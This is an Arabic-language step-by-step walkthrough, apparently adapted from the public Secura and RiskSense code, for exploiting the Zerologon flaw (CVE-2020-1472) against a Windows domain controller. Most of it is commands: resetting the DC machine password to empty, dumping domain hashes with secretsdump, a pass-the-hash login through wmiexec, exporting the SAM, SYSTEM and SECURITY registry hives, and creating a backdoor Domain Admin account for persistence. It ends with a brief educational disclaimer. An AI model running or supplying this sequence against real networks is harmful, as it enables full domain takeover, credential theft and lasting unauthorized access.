
سكربت zerologon لاستغلال CVE-2020-1472 بمعدل CVSS 10/10
سكربت zerologon لاستغلال CVE-2020-1472 CVSS 10/10 الكود البرمجي للاستغلال مبني على https://www.secura.com/blog/zero-logon و https://github.com/SecuraBV/CVE-2020-1472. البحث الأصلي والماسح الضوئي من قبل Secura، مع تعديلات من RiskSense Inc. https://github.com/risksense/zerologon
لاستغلال الثغرة، قم بإزالة أي تثبيتات سابقة لـ Impacket لديك وقم بتثبيت Impacket من https://github.com/SecureAuthCorp/impacket/commit/b867b21 أو إصدار أحدث.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
ثم قم بما يلي:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
إذا نجح ذلك، فستتمكن بعدها من:
sudo secretsdump.py -just-dc domain/hostname\$@ip
الضغط على "Enter" عند طلب كلمة المرور سيمرر لك، وهو ما يجب أن يمنحك تجزئة مسؤول المجال Domain Admin hash. بعد الحصول على ذلك، استخدم wmiexec.py للاتصال بخادم المجال الهدف باستخدام بيانات اعتماد من secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
وقم بـ:
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
وبعد ذلك يمكنك إنشاء حساب Admin جديد كإجراء احتياطي،
net user myadmin Hello1234 /ADD /DOMAIN
وقم بإضافة الحساب الجديد إلى مجموعة Domain Admins للحصول على صلاحيات كاملة،
net group "Domain Admins" myadmin /ADD /DOMAIN
وربما اكتب exit الآن من موجه C:>
ثم يمكنك تشغيل
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
وهذا يجب أن يعرض لك تجزئة NT الأصلية لحساب الجهاز. يمكنك بعد ذلك إعادة تثبيت تجزئة حساب الجهاز الأصلية تلك إلى المجال عبر
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
إعادة تثبيت التجزئة الأصلية ضرورية لكي يستمر خادم المجال DC في العمل بشكل طبيعي.
وللتأكد فقط من أن عملية الاستعادة نجحت،
sudo secretsdump.py -just-dc domain/hostname\$@ip
ولن يعود الضغط على "Enter" عند طلب كلمة المرور يعمل بعد الآن.
وبهذا نكون انتهينا هنا.
صيدًا سعيدًا.
إخلاء مسؤولية: هذا لأغراض تعليمية بحتة، ولن أتحمل أي مسؤولية عن أي أفعال أو عواقبها. اختراق جهاز شخص آخر غير قانوني ويعاقب عليه القانون.